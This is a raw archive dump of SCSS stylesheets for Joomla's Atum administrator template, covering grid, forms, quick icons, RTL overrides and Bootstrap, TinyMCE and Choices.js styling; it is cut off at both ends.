    grid-gap: 1rem 2rem;
  }

  @include media-breakpoint-up(lg) {
    --span-5: span 5;

    grid-template-columns: repeat(6, 1fr);
  }

  > * {
    grid-column: 1 / -1;
  }

  .stack {
    flex-direction: column;
  }

  .span-1 {
    grid-column: 1 / var(--span-1);

    &-inline {
      grid-column: var(--span-1);
    }
  }

  .span-2 {
    grid-column: 1 / var(--span-2);

    &-inline {
      grid-column: var(--span-2);
    }
  }

  .span-3 {
    grid-column: 1 / var(--span-3);

    &-inline {
      grid-column: var(--span-3);
    }
  }

  .span-4 {
    grid-column: 1 / var(--span-4);

    &-inline {
      grid-column: var(--span-4);
    }
  }

  .span-5 {
    grid-column: 1 / var(--span-5);

    &-inline {
      grid-column: var(--span-5);
    }
  }

  @include media-breakpoint-up(lg) {
    .offset-1 {
      grid-column-start: 2;
    }

    .offset-2 {
      grid-column-start: 3;
    }

    .offset-3 {
      grid-column-start: 4;
    }

    .offset-4 {
      grid-column-start: 5;
    }

    .offset-5 {
      grid-column-start: 6;
    }
  }
}


// Sizing

.w-1 {
  width: 1%;
}

.w-3 {
  width: 3%;
}

.w-5 {
  width: 5%;
}

.w-6 {
  width: 6%;
}

.w-7 {
  width: 7%;
}

.w-10 {
  width: 10%;
}

.w-12 {
  width: 12%;
}

.w-15 {
  width: 15%;
}

.w-20 {
  width: 20%;
}

.w-30 {
  width: 30%;
}

.w-35 {
  width: 35%;
}

.w-40 {
  width: 40%;
}

.w-60 {
  width: 60%;
}

.w-80 {
  width: 80%;
}

.editor-xtd-buttons .btn {
  margin-bottom: 5px;
}
PK!�#��11atum/scss/blocks/_switcher.scssnu&1i�.switcher {
  .toggle-outside {
    border: $input-border;
    border-radius: $border-radius;

    &:focus {
      box-shadow: $input-box-shadow;
    }
  }
  input:focus ~ .toggle-outside {
    border-color: $focuscolor;
    box-shadow: $focusshadow;
  }
}
.disabled {
  opacity: $btn-disabled-opacity;
}
PK!�h'�33atum/scss/blocks/_form.scssnu&1i�// Form

.form-control {
  max-width: $input-max-width;
  background-color: $white;
  border: $input-border;
  border-radius: $border-radius;

  &:focus {
    border-color: $focuscolor;
    box-shadow: $focusshadow;
  }
}

.control-group {
  position: relative;
  display: flex;
  flex-wrap: wrap;
  margin: 0 0 1rem;

  > .form-check {
    display: inline-block;
  }

  &::after {
    display: table;
    clear: both;
    content: "";
  }

  .control-label {
    width: 240px;
    padding: .3rem 1rem .3rem 0;
  }

  .controls {
    position: relative;
    flex: 1;
    min-width: 210px;

    + div {
      width: 100%;
      margin: 5px 0 10px;
    }
  }

  .form-vertical & {
    flex-direction: column;
  }

}

.spacer {
  hr {
    width: 380px;
  }

  label {
    width: 440px;
  }
}

td .form-control {
  display: inline-block;
  width: auto;
}

.checkboxes {
  padding-top: 5px;

  .checkbox input {
    position: static;
    margin-left: 0;
  }
}

.form-check {
  padding-top: 5px;
  margin-bottom: 0;
}

.modal label {
  width: 100%;
}

// Validation
.invalid {
  color: var(--danger);
  border-color: var(--danger);
}

.valid {
  border-color: var(--success);
}

.form-control-feedback {
  display: block;
}

[aria-grabbed="true"] {
  box-shadow: $input-box-shadow;
}

.sortable-handler.inactive {
  opacity: .3;
}

// set up hidden tooltip
[role="tooltip"]:not(.show) {
  z-index: $zindex-tooltip;
  display: none;
  padding: .5em;
  margin: .25em;
  color: $white;
  text-align: start;
  background: $black;
  border-radius: .2rem !important;
}

// reveal associated tooltip on focus
:focus + [role="tooltip"],
:hover + [role="tooltip"] {
  position: absolute;
  display: block;
}

[id="filter[search]-desc"] {
  bottom: 100%;
}

.container-popup [id="filter[search]-desc"] {
  top: 100%;
  bottom: auto;
}

.input-group > .form-control[readonly] {
  margin-right: 1px;
}

.form-group {
  @extend .mb-3;
}

// Subform - non table layout
div.subform-repeatable-group {
  position: relative;
  padding: 32px 32px 16px 28px;
  margin-top: 20px;
  border: $input-border;
  border-radius: $border-radius;

  > .btn-toolbar {

    .btn-group {
      position: static;
    }

    .btn {
      position: absolute;

      &.group-add {
        right: -1px;
        bottom: -1px;
        border-radius: $border-radius 0 $border-radius 0;
      }
      &.group-remove {
        top: -1px;
        right: -1px;
        border-radius: 0 $border-radius 0 $border-radius;
      }
      &.group-move {
        top: 50%;
        right: 100%;
        margin-top: -27px;
        line-height: 52px;
        border-radius: $border-radius 0 0 $border-radius;
      }
    }
  }
}

// Highlight draggable section
.subform-repeatable-group[draggable="true"] {
  // For non table layout
  background-color: $teal;

  // For table layout
  > td {
    background-color: $teal;
  }
}
PK!-��&EE!atum/scss/blocks/_quickicons.scssnu&1i�// Quick Icons

.quick-icons {
  background-color: $white;

  .nav {
    display: grid;
    grid-template-columns: repeat(auto-fit, minmax(190px, 1fr));
    grid-gap: 1rem;
  }

  a {
    text-decoration: none;
  }

  ul {
    padding: 0;
  }

  .quickicon {
    --text-color: hsl(var(--hue), 30%, 40%);
    --bg-color: hsl(var(--hue), 60%, 97%);
    --icon-color: hsl(var(--hue), 30%, 40%);
    --bg-color-hvr: var(--template-bg-dark);

    display: flex;
    flex-grow: 1;

    a {
      display: flex;
      flex-direction: column;
      flex-grow: 1;
      justify-content: flex-end;
      padding: 0 1rem;
      color: var(--text-color);
      background-color: var(--bg-color);
      transition: all .25s ease;

      .quickicon-icon {
        margin-top: .5rem;
        margin-inline-start: .2rem;

        > * {
          font-size: $quickicon-icon-size;
          color: var(--icon-color);
        }
      }

      .quickicon-name {
        padding: .125rem 0 .6rem;
        font-size: $display2-size;
        font-weight: bold;
      }

      .quickicon-amount {
        padding: .25rem .5rem;
        font-weight: $bold-weight;
        line-height: 1rem;
        background: hsl(var(--hue),50%,93%);
        border-radius: $border-radius;
        transition: all .25s ease;
        margin-inline-start: .5rem;
      }

      .j-links-link {
        display: block;
        padding: 0 .2rem;
        line-height: 1.1;
      }

      &:hover,
      &:focus,
      &:active {
        color: $white;
        text-decoration: none;
        background: var(--bg-color-hvr);

        .quickicon-amount {
          background: var(--icon-color);
        }
      }

      &.warning,
      &.danger {
        --text-color: var(--danger);
        --bg-color: #f4f0f0;
        --icon-color: #ce8484;
        --bg-color-hvr: var(--danger);
      }

      &.success {
        --text-color: var(--success);
        --bg-color: #f3f9f3;
        --icon-color: #55a258;
        --bg-color-hvr: var(--success);
      }
    }
  }

  .quickicon-info {
    display: flex;
    align-items: flex-end;
  }

  .quickicon-linkadd {
    width: 2.5rem;
    font-size: 1.2rem;
    background: hsl(var(--hue),50%,93%);
    transition: all .25s ease;

    a {
      align-items: flex-end;
      justify-content: center;
      width: 100%;

      > * {
        margin-bottom: 10px;
        color: hsl(var(--hue), 30%, 40%);
      }

      &:hover,
      &:focus,
      &:active {
        background: var(--template-bg-dark);

        * {
          color: $white;
        }
      }
    }
  }

  .quickicon-single,
  .quickicon-group {
    display: flex;
    min-height: 6rem;
    overflow: hidden;
    border: 1px solid hsl(var(--hue),50%,93%);
    border-radius: 4px;
  }
}

#content .menu-quicktask {
  position: absolute;

  [dir=ltr] & {
    right: 1.25rem;
  }

  [dir=rtl] & {
    left: 1.25rem;
  }
}
PK!Ũُ��-atum/scss/system/searchtools/searchtools.scssnu&1i�@import "../../variables";

// Search tools

.js-stools {
  display: flex;
  flex-wrap: wrap;
}

.js-stools-container-bar,
.js-stools-container-filters {
  margin-bottom: 10px;
}

.js-stools-container-bar {
  margin-inline-start: auto;

  .btn-toolbar {
    justify-content: flex-end;

    > * {
      margin: 5px 0;

      + * {
        margin-inline-start: 8px;
      }
    }

    .js-stools-btn-clear {
      background-color: var(--template-bg-dark);
      border: 0;
    }
  }

  .ordering-select {
    display: flex;
  }
}

.js-stools-container-filters {
  display: none;
  width: 100%;

  &-visible {
    display: grid;
    grid-gap: 8px;
    grid-template-columns: repeat(auto-fill, minmax(220px, 1fr));
    padding: 10px;
    background-color: $white;
  }
}

.js-stools-field-list {
  + .js-stools-field-list {
    margin-inline-start: 8px;
  }
}

.js-stools-container-selector {
  margin: 5px 0;
  margin-inline-end: 8px;
}
PK!�0���atum/scss/template.scssnu&1i�// Bootstrap functions
@import "../../../../media/vendor/bootstrap/scss/functions";

// Atum Variables
@import "variables";

// Mixins
@import "mixin";

// Bootstrap other
@import "vendor/bootstrap";

// Fonts
@import "../../../../media/vendor/roboto-fontface/scss/roboto/sass/roboto-fontface";

@import "blocks/global"; // Leave this first

// jQuery Minicolors
@import "../../../../build/media_source/system/scss/jquery-minicolors";

// Vendor overrides
@import "vendor/bootstrap/badge";
@import "vendor/bootstrap/buttons";
@import "vendor/bootstrap/card";
@import "vendor/bootstrap/custom-forms";
@import "vendor/bootstrap/collapse";
@import "vendor/bootstrap/dropdown";
@import "vendor/bootstrap/form";
@import "vendor/bootstrap/lists";
@import "vendor/bootstrap/modal";
@import "vendor/bootstrap/pagination";
@import "vendor/bootstrap/reboot";
@import "vendor/bootstrap/table";

// Blocks
@import "blocks/alerts";
@import "blocks/edit";
@import "blocks/header";
@import "blocks/form";
@import "blocks/icons";
@import "blocks/iframe";
@import "blocks/layout";
@import "blocks/login";
@import "blocks/modals";
@import "blocks/quickicons";
@import "blocks/lists";
@import "blocks/sidebar";
@import "blocks/sidebar-nav";
@import "blocks/switcher";
@import "blocks/toolbar";
@import "blocks/treeselect";
@import "blocks/utilities";

// These DO NOT BELONG HERE!!!
@import "vendor/codemirror";
@import "vendor/dragula";
@import "vendor/tinymce";

// Also these DO NOT BELONG HERE!!!
// Page specifics
@import "pages/com_config";
@import "pages/com_content";
@import "pages/com_cpanel";
@import "pages/com_joomlaupdate";
@import "pages/com_modules";
@import "pages/com_tags";
@import "pages/com_privacy";
@import "pages/com_templates";
@import "pages/com_users";

// Forcing reduced motion when set in the user OS
@media (prefers-reduced-motion: reduce) {
  *, ::before, ::after {
    background-attachment: initial !important;
    transition-delay: 0s !important;
    // temp fix until https://github.com/onokumus/metismenujs/issues/9 is addressed
    transition-duration: .001ms !important;
    animation-duration: 1ms !important;
    animation-delay: -1ms !important;
    animation-iteration-count: 1 !important;
    scroll-behavior: auto !important;
  }
}
PK!�B��atum/scss/template-rtl.scssnu&1i�@import "template";
@import "vendor/bootstrap/bootstrap-rtl";

// Global
dl,
ol,
ul {
  padding-right: 0;
}

.dropdown-menu-end {

  &::after {
    right: auto;
    left: .9rem;
  }
}

.sidebar-wrapper {
  right: 0;
  left: auto;
}

.menu-collapse {
  right: 0;
  left: auto;
  margin-right: -7.5px;
  margin-left: 0;
}

.field-calendar {
  float: none;
}

.form-text {
  float: right;
}

.field-user-wrapper {
  float: none;
}

// System panel
.menu-quicktask,
.menu-badge {
  float: left;
}

// Redirect urls fields
#jform_new_url,
#jform_old_url,
#new_url {
  text-align: left;
}

// Database prefix
#jform_dbprefix {
  text-align: right;
  direction: ltr;
}

// skipto
.skip-to {
  [role="separator"] {
    text-align: right !important;
  }
}

.input-group > .form-control:not(:last-child),
.input-group > .form-select:not(:last-child) {
  @include border-start-radius(0);
  @include border-end-radius($border-radius);
}

.btn-group > .btn:first-child:not(.dropdown-toggle) {
  @include border-end-radius($border-radius);
}

.btn-group > .btn:not(:last-child):not(.dropdown-toggle),
.btn-group > .btn-group:not(:last-child) > .btn {
  @include border-start-radius(0);
  margin-left: -1px;
}

.btn-group > .btn:last-child:not(.dropdown-toggle) {
  @include border-start-radius($border-radius);
}

.btn-group > .btn:not(:first-child),
.btn-group > .btn-group:not(:first-child) {
  @include border-end-radius(0);
}
PK!��kqq atum/scss/vendor/_bootstrap.scssnu&1i�// Variables

// Media, Jumbotron & Print removed https://getbootstrap.com/docs/5.0/migration/
// Code is now in reboot https://github.com/twbs/bootstrap/pull/28917/files

@import "../../../../../media/vendor/bootstrap/scss/variables";
@import "../../../../../media/vendor/bootstrap/scss/mixins";
@import "../../../../../media/vendor/bootstrap/scss/root";
@import "../../../../../media/vendor/bootstrap/scss/reboot";
@import "../../../../../media/vendor/bootstrap/scss/type";
@import "../../../../../media/vendor/bootstrap/scss/images";
@import "../../../../../media/vendor/bootstrap/scss/containers";
@import "../../../../../media/vendor/bootstrap/scss/grid";
@import "../../../../../media/vendor/bootstrap/scss/tables";
@import "../../../../../media/vendor/bootstrap/scss/forms";
@import "../../../../../media/vendor/bootstrap/scss/buttons";
@import "../../../../../media/vendor/bootstrap/scss/transitions";
@import "../../../../../media/vendor/bootstrap/scss/dropdown";
@import "../../../../../media/vendor/bootstrap/scss/accordion";
@import "../../../../../media/vendor/bootstrap/scss/button-group";
@import "../../../../../media/vendor/bootstrap/scss/nav";
@import "../../../../../media/vendor/bootstrap/scss/navbar";
@import "../../../../../media/vendor/bootstrap/scss/card";
@import "../../../../../media/vendor/bootstrap/scss/breadcrumb";
@import "../../../../../media/vendor/bootstrap/scss/pagination";
@import "../../../../../media/vendor/bootstrap/scss/badge";
@import "../../../../../media/vendor/bootstrap/scss/alert";
@import "../../../../../media/vendor/bootstrap/scss/progress";
@import "../../../../../media/vendor/bootstrap/scss/list-group";
@import "../../../../../media/vendor/bootstrap/scss/close";
@import "../../../../../media/vendor/bootstrap/scss/modal";
@import "../../../../../media/vendor/bootstrap/scss/tooltip";
@import "../../../../../media/vendor/bootstrap/scss/popover";
@import "../../../../../media/vendor/bootstrap/scss/carousel";
@import "../../../../../media/vendor/bootstrap/scss/utilities";
@import "../../../../../media/vendor/bootstrap/scss/utilities/api";
@import "../../../../../media/vendor/bootstrap/scss/helpers";
PK!#��rr(atum/scss/vendor/bootstrap/_buttons.scssnu&1i�// Buttons

.btn {
  transition: none;
}

@include media-breakpoint-down(sm) {
  .btn {
    margin-bottom: .25rem;
  }
  .input-group .btn {
    margin-bottom: 0;
  }
}

.btn-primary {
  color: var(--template-text-light);
  background-color: var(--template-bg-dark-60);
  border-color: var(--template-bg-dark-60);

  &:hover,
  &:focus,
  &:active {
    background-color: var(--template-bg-dark-70);
    border-color: var(--template-bg-dark-90);
  }

  &:not(:disabled):not(.disabled):active,
  &:not(:disabled):not(.disabled).active,
  .show > &.dropdown-toggle {
    background-color: var(--template-bg-dark);
    border-color: var(--template-bg-dark);
  }
}

.btn-secondary {
  background-color: var(--template-bg-dark-60);
  border-color: var(--template-bg-dark-60);
}

.input-group-text {
  background-color: var(--template-bg-dark);
  border-color: var(--template-bg-dark);
}
PK!�[���.atum/scss/vendor/bootstrap/_bootstrap-rtl.scssnu&1i�// Bootstrap rtl overrides

.float-start {
  float: right !important;
}

.float-end {
  float: left !important;
}

.modal-header {
  .btn-close {
    margin: -.5rem auto -.5rem -.5rem;
  }
}

.text-start {
  text-align: right !important;
}

.text-end {
  text-align: left !important;
}

.me-0 {
  margin-right: auto !important;
  margin-left: 0 !important;
}

.me-1 {
  margin-right: auto !important;
  margin-left: .25rem !important;
}

.me-2 {
  margin-right: auto !important;
  margin-left: .5rem !important;
}

.me-3 {
  margin-right: auto !important;
  margin-left: 1rem !important;
}

.me-4 {
  margin-right: auto !important;
  margin-left: 1.5rem !important;
}

.me-5 {
  margin-right: auto !important;
  margin-left: 3rem !important;
}

.me-auto {
  margin-right: 0 !important;
  margin-left: auto !important;
}

.ms-0 {
  margin-right: 0 !important;
  margin-left: auto !important;
}

.ms-1 {
  margin-right: .25rem !important;
  margin-left: auto !important;
}

.ms-2 {
  margin-right: .5rem !important;
  margin-left: auto !important;
}

.ms-3 {
  margin-right: 1rem !important;
  margin-left: auto !important;
}

.ms-4 {
  margin-right: 1.5rem !important;
  margin-left: auto !important;
}

.ms-5 {
  margin-right: 3rem !important;
  margin-left: auto !important;
}

.ms-auto {
  margin-right: auto !important;
  margin-left: 0 !important;
}

.pe-0 {
  padding-right: 0 !important;
  padding-left: 0 !important;
}
.pe-1 {
  padding-right: 0 !important;
  padding-left: .25rem !important;
}
.pe-2 {
  padding-right: 0 !important;
  padding-left: .5rem !important;
}
.pe-3 {
  padding-right: 0 !important;
  padding-left: 1rem !important;
}
.pe-4 {
  padding-right: 0 !important;
  padding-left: 1.5rem !important;
}
.pe-5 {
  padding-right: 0 !important;
  padding-left: 3rem !important;
}

.ps-0 {
  padding-right: 0 !important;
  padding-left: 0 !important;
}
.ps-1 {
  padding-right: .25rem !important;
  padding-left: 0 !important;
}
.ps-2 {
  padding-right: .5rem !important;
  padding-left: 0 !important;
}
.ps-3 {
  padding-right: 1rem !important;
  padding-left: 0 !important;
}
.ps-4 {
  padding-right: 1.5rem !important;
  padding-left: 0 !important;
}
.ps-5 {
  padding-right: 3rem !important;
  padding-left: 0 !important;
}


.input-group {
  &:not(.has-validation) {
    > :not(:last-child):not(.dropdown-toggle):not(.dropdown-menu),
    > .dropdown-toggle:nth-last-child(n + 3) {
      @include border-end-radius($border-radius);
    }
  }

  &.has-validation {
    > :nth-last-child(n + 3):not(.dropdown-toggle):not(.dropdown-menu),
    > .dropdown-toggle:nth-last-child(n + 4) {
      @include border-end-radius(0);
    }
  }
  $validation-messages: "";
  @each $state in map-keys($form-validation-states) {
    $validation-messages: $validation-messages + ":not(." + unquote($state) + "-tooltip)" + ":not(." + unquote($state) + "-feedback)";
  }

  > :not(:first-child):not(.dropdown-menu)#{$validation-messages} {
    margin-left: -$input-border-width;
    @include border-start-radius(0);
    @include border-end-radius(0);
  }

  > :last-child:not(.dropdown-menu)#{$validation-messages} {
    margin-left: -$input-border-width;
    @include border-start-radius($border-radius);
    @include border-end-radius(0);
  }
}
PK!����//+atum/scss/vendor/bootstrap/_pagination.scssnu&1i�// Pagination

.pagination {
  margin: 1rem;
}
PK!��J��&atum/scss/vendor/bootstrap/_table.scssnu&1i�// Table

.table {
  thead {

    th {
      font-size: $label-font-size;
    }

    th,
    td {
      white-space: nowrap;

      .sysinfo & {
        white-space: normal;
      }
    }

    a {
      color: var(--template-link-color);

      &#sorted {
        font-weight: $medium-weight;
        color: $gray-800;
      }
    }

    .actions,
    .actions-th1 {
      @include media-breakpoint-down(md) {
        width: 28%;
      }
    }
  }

  tbody {
    tr {
      &:hover,
      &:focus,
      &:active {
        background-color: $table-hover-bg;
      }

      &:last-of-type {
        th,
        td {
          border-bottom: 0;
        }
      }
    }

    .itemnumber a.btn,
    .itemnumber span.btn {
      padding: .1rem .5rem;
      text-decoration: none;
    }

    th {
      font-weight: $medium-weight;
    }

    a:not(.badge) {
      text-decoration: underline;
    }
  }

  th,
  td {
    label {
      margin-bottom: 0;
    }

    .inactive [class^="#{$jicon-css-prefix}-"],
    .inactive [class*=" #{$jicon-css-prefix}-"],
    .inactive [class^="#{$fa-css-prefix}-"],
    .inactive [class*=" #{$fa-css-prefix}-"] {
      color: $gray-400;
    }
  }

  .j-main-container > & {
    box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
  }
}
PK!�:�z��%atum/scss/vendor/bootstrap/_form.scssnu&1i�// Form

label {
  margin-bottom: 0;
}

td .form-control {
  display: inline-block;
  width: auto;
}

legend {
  margin-bottom: 1.1rem;
  font-size: 1rem;
  font-weight: $font-weight-normal;
}

.checkboxes {
  padding-top: 5px;

  .checkbox input {
    position: static;
    margin-left: 0;
  }
}

.form-check {
  padding-top: 5px;
  margin-bottom: 0;
}

.modal label {
  width: 100%;
}

// Validation
.invalid {
  color: var(--danger);
  border-color: var(--danger);
}

.valid {
  border-color: var(--success);
}

.form-control-feedback {
  display: block;
}

[aria-grabbed="true"] {
  box-shadow: 0 0 2px 1px var(--template-bg-dark);
}

select.form-control {
  background-color: $form-select-bg;
}

.field-media-wrapper {
  display: block;
  width: 100%;
  max-width: calc(50vw - 5rem);

  .field-media-preview {
    width: 100%;
    max-width: none;
  }

  .button-select {
    background-color: darken($success, 8%);
  }

  .button-clear {
    background-color: darken($danger, 8%);
  }

  .button-clear > .#{$fa-css-prefix}-check,
  .button-select > .#{$fa-css-prefix}-times {
    color: $gray-100;
  }

  @include media-breakpoint-down(lg) {
    min-width: 100%;
  }
}

// Bootstrap 4 b/c
.form-inline .form-select, .form-inline .custom-select, .form-inline .form-control {
  display: inline-block;
  width: auto;
}

@include media-breakpoint-down(md) {
  .form-inline .form-select, .form-inline .custom-select, .form-inline .form-control {
    width: 100%;
  }
}
PK!rE�GG-atum/scss/vendor/bootstrap/_custom-forms.scssnu&1i�// Custom Forms

.custom-select {
  @extend .form-select;
}

.form-select {
  max-width: $input-max-width;
  cursor: pointer;
  background: $form-select-background;
  background-color: $form-select-bg;
  border: $input-border;

  [dir=rtl] & {
    padding: $form-select-padding-y $form-select-padding-x $form-select-padding-y ($form-select-padding-x + $form-select-indicator-padding);
    background: $form-select-background-rtl;
    background-color: $form-select-bg;
  }

  &[multiple] {
    padding: 0;
    background-color: var(--white-offset);

    option {
      padding: $form-select-multiple-padding-y $form-select-padding-x;
      background-color: var(--white-offset);

      &:checked {
        color: var(--template-text-light);
        background-color: var(--template-bg-dark) !important;
      }
    }
  }

  &.form-select-success,
  &.custom-select-success {
    color: var(--success);
    background-color: var(--success);
    border-color: var(--success);

    option {
      color: $form-select-color;
      background-color: var(--white-offset);
    }
  }

  &.form-select-danger,
  &.custom-select-danger {
    color: var(--danger);
    background-color: var(--danger);
    border-color: var(--danger);

    option {
      color: $form-select-color;
      background-color: var(--white-offset);
    }
  }

  &:focus {
    border-color: $focuscolor;
    box-shadow: $focusshadow;
  }

  &:disabled {
    cursor: default;
    background: $gray-200;
    border: 0;
    box-shadow: none;
  }

  optgroup,
  option {
    color: var(--template-text-dark);
    background-color: $white;
  }
}
PK!ʝ]�)atum/scss/vendor/bootstrap/_dropdown.scssnu&1i�// Dropdown

.btn-group .dropdown-menu {
  min-width: 100%;
  background: $white;
  box-shadow: $dropdown-box-shadow;

  joomla-toolbar-button {
    text-align: start;
    border: 0;
  }
}

.dropdown-menu {
  box-shadow: $atum-box-shadow;
}

.dropdown-item {
  text-align: start;
  border-bottom: 1px solid rgba(0, 0, 0, .1);

  &:hover,
  &:focus {
    .btn-primary + .dropdown-menu & {
      background-color: var(--template-bg-dark);
    }

    .btn-secondary + .dropdown-menu & {
      color: var(--template-text-light);
      background-color: var(--secondary);
    }

    .btn-danger + .dropdown-menu & {
      background-color: var(--danger);
    }

    .btn-info + .dropdown-menu & {
      background-color: var(--info);
    }

    .dropdown-status-group .dropdown-menu &:not(.disabled) {
      color: var(--template-text-light);
      background-color: var(--template-bg-dark);
    }

    .dropdown-save-group .dropdown-menu &:not(.disabled) {
      color: var(--template-text-light);
      background-color: var(--success);
    }
  }

  + .dropdown-item {
    border-top: 1px solid rgba(0, 0, 0, .1);
  }

  .dropdown-status-group .dropdown-menu &:not(.disabled) {
    color: var(--action);
  }

  .dropdown-save-group .dropdown-menu &:not(.disabled) {
    color: var(--success);
  }

  &.first:not(.last) {
    border-bottom-right-radius: 0;
    border-bottom-left-radius: 0;
  }

  &.last:not(.first) {
    border-top-left-radius: 0;
    border-top-right-radius: 0;
  }

  &:not(.first):not(.last):not(:only-of-type) {
    border-radius: 0;
  }
}
PK!�ɿٷ�%atum/scss/vendor/bootstrap/_card.scssnu&1i�// Card

// Backport Bootstrap 4 card-columns
.card-columns {
  .card {
    margin-bottom: $card-spacer-y;
  }

  @include media-breakpoint-up(sm) {
    column-count: 3;
    column-gap: 1.25rem;
    orphans: 1;
    widows: 1;

    .card {
      display: inline-block; // Don't let them vertically span multiple columns
      width: 100%; // Don't let their width change
    }
  }
}

.content {
  .card {
    box-shadow: $atum-box-shadow;
  }

  .card-header {
    display: flex;
    padding: 1rem 1rem .75rem;
    font-weight: $font-weight-bold;
    color: var(--template-bg-dark);
    background: var(--card-bg);

    > [class^="icon-"],
    > img {
      margin-inline-end: .5rem;
    }
  }
}
PK!����)atum/scss/vendor/bootstrap/_collapse.scssnu&1i�// Collapse

.accordion {

  .card-header {
    display: block;
    font-size: $h5-font-size;
    font-weight: $font-weight-bold;
    line-height: $headings-line-height;
  }

  .list-group-item {
    color: $link-color;
  }
}
PK!�Ҟ\&atum/scss/vendor/bootstrap/_modal.scssnu&1i�// Modal

.jviewport-height {
  &10 {
    height: 10vh;
  }

  &20 {
    height: 20vh;
  }

  &30 {
    height: 30vh;
  }

  &40 {
    height: 40vh;
  }

  &50 {
    height: 50vh;
  }

  &60 {
    height: 60vh;
  }

  &70 {
    height: 70vh;
  }

  &80 {
    height: 80vh;
  }

  &90 {
    height: 90vh;
  }

  &100 {
    height: 100vh;
  }
}

[class*=jviewport-height] iframe {
  height: 100%;
}

.modal-dialog.jviewport-width {
  &10 {
    width: 10vw;
  }

  &20 {
    width: 20vw;
    max-width: none;
  }

  &30 {
    width: 30vw;
    max-width: none;
  }

  &40 {
    width: 40vw;
    max-width: none;
  }

  &50 {
    width: 50vw;
    max-width: none;
  }

  &60 {
    width: 60vw;
    max-width: none;
  }

  &70 {
    width: 70vw;
    max-width: none;
  }

  &80 {
    width: 80vw;
    max-width: none;
  }

  &90 {
    width: 90vw;
    max-width: none;
  }

  &100 {
    width: 100vw;
    max-width: none;
  }
}

.modal-dialog {
  @include media-breakpoint-down(md) {
    margin: 1.75rem auto;
  }

  .modal-body {
    padding: 0;
  }
}
PK!G ���'atum/scss/vendor/bootstrap/_reboot.scssnu&1i�// Matches default `<td>` alignment by inheriting `text-align`.
// 1. Fix alignment for Safari

th {
  text-align: inherit;
  /* stylelint-disable-next-line */
  text-align: -webkit-match-parent; // 1
}
PK! ,W��&atum/scss/vendor/bootstrap/_lists.scssnu&1i�// Lists

@import "../../variables";

.list-group-item {
  background-color: $list-group-bg;
}

.list-unstyled .list-unstyled {
  padding-left: 20px;
}
PK!�b��&atum/scss/vendor/bootstrap/_badge.scssnu&1i�// Badge
@import "../../variables";

.badge {
  @include media-breakpoint-down(md) {
    white-space: normal;
  }

  &.bg-secondary {
    &:hover {
      color: $white;
    }
  }
}
PK!V�++atum/scss/vendor/_tinymce.scssnu&1i�// TinyMCE

.editor {

  .toggle-editor {
    margin-top: 1rem;
  }

  .mce-tinymce {
    border: 1px solid var(--template-bg-dark);
  }

  .mce-btn,
  .mce-panel {
    background: var(--white-offset);
  }
}


.container-main {
  .mce-panel {
    background: transparent;
    border: 0;
    box-shadow: none;
  }

  .mce-top-part {
    margin-bottom: 1rem;

    &::before {
      box-shadow: none;
    }
  }

  .mce-menubar .mce-menubtn {
    background-color: $white;
  }

  .mce-flow-layout-item {
    margin: 2px 8px 2px 0;
  }

  .mce-btn-group {

    &:not(:first-child) {
      margin-right: 6px;
      margin-left: 0;
    }

    .mce-btn {
      margin: 0 1px 0 0;
    }

  }

  .mce-statusbar .mce-container-body {
    background-color: $white;
    border-top: var(--template-bg-light) 1px solid;
  }
}
PK!��d��+atum/scss/vendor/minicolors/minicolors.scssnu&1i�// Minicolours
@import "../../../../../../node_modules/@claviska/jquery-minicolors/jquery.minicolors";

.minicolors-theme-bootstrap {

  .minicolors-input {
    width: 140px;
  }

  .rgb {
    width: 175px;
  }

  .rgba {
    width: 220px;
  }
}
PK!�����2atum/scss/vendor/fontawesome-free/fontawesome.scssnu&1i�// Override the font path
$fa-css-prefix:                    fa;
$fa-font-path:                     "../../../../../../media/vendor/fontawesome-free/webfonts" !default;

// Font Awesome 5 Free
@import "../../../../../../media/vendor/fontawesome-free/scss/fontawesome";
@import "../../../../../../media/vendor/fontawesome-free/scss/regular";
@import "../../../../../../media/vendor/fontawesome-free/scss/solid";

// Brands must be imported last
@import "../../../../../../media/vendor/fontawesome-free/scss/brands";

// B/C for Icomoon
@import "../../../../../../build/media_source/system/scss/icomoon";

// RTL override
html[dir=rtl] .float-right {
  float: left;
}
PK!�*�q��'atum/scss/vendor/choicesjs/choices.scssnu&1i�@import "../../../../../../media/vendor/bootstrap/scss/functions";

// Atum Variables
@import "../../variables";

// Mixins
@import "../../mixin";

@import "../../../../../../media/vendor/bootstrap/scss/variables";
@import "../../../../../../media/vendor/bootstrap/scss/mixins";

// choices.js
@import "../../../../../../node_modules/choices.js/src/styles/choices";

.choices {
  border: 0;
  border-radius: $border-radius;

  &:hover {
    cursor: pointer;
  }

  &.is-focused {
    box-shadow: $focusshadow;
  }
}

.choices__inner {
  min-height: 42px;
  padding: .1rem 1rem;
  margin-bottom: 0;
  font-size: 1rem;
  border: $input-border;
  border-radius: $border-radius;

  .is-focused & {
    border-color: $focuscolor;
  }
}

.choices__input {
  padding: 0;
  margin-bottom: 0;
  font-size: 1rem;
  background-color: transparent;

  &::-moz-placeholder {
    color: $gray-700;
    opacity: 1;
  }

  &::-webkit-input-placeholder {
    color: $gray-700;
    opacity: 1;
  }
}

.choices__list--dropdown {
  z-index: $zindex-popover;
}

.choices__list--single {
  padding: 7px 16px 0 4px;
}

.choices__list--multiple .choices__item {
  position: relative;
  margin: 2px;
  background-color: var(--template-bg-dark);
  margin-inline-end: 2px;
  border: 0;
  border-radius: $border-radius;

  &.is-highlighted {
    background-color: var(--template-bg-dark);
    opacity: .9;
  }
}

.choices .choices__list--dropdown {
  .choices__item {
    padding-inline-end: 10px;
  }

  .choices__item--selectable::after {
    display: none;
  }
}

.choices__button_joomla {
  position: relative;
  padding: 0 10px;
  color: inherit;
  text-indent: -9999px;
  cursor: pointer;
  background: none;
  border: 0;
  opacity: .5;
  appearance: none;

  &::before {
    position: absolute;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    display: block;
    text-align: center;
    text-indent: 0;
    content: "\00d7";
  }

  &:hover,
  &:focus {
    opacity: 1;
  }

  &:focus {
    outline: none;
  }
}

.choices[data-type*="select-one"],
.choices[data-type*="select-multiple"] {
  .choices__inner {
    padding-inline-end: $form-select-indicator-padding;
    cursor: pointer;
    background: url("../../../images/select-bg.svg") no-repeat 100%/116rem;
    background-color: $form-select-bg;

    [dir="rtl"] & {
      background: url("../../../images/select-bg-rtl.svg") no-repeat 0/116rem;
      background-color: $form-select-bg;
    }
  }
}

.choices[data-type*="select-one"] {
  .choices__item {
    display: flex;
    justify-content: space-between;
  }

  .choices__button_joomla {
    position: absolute;
    top: 50%;
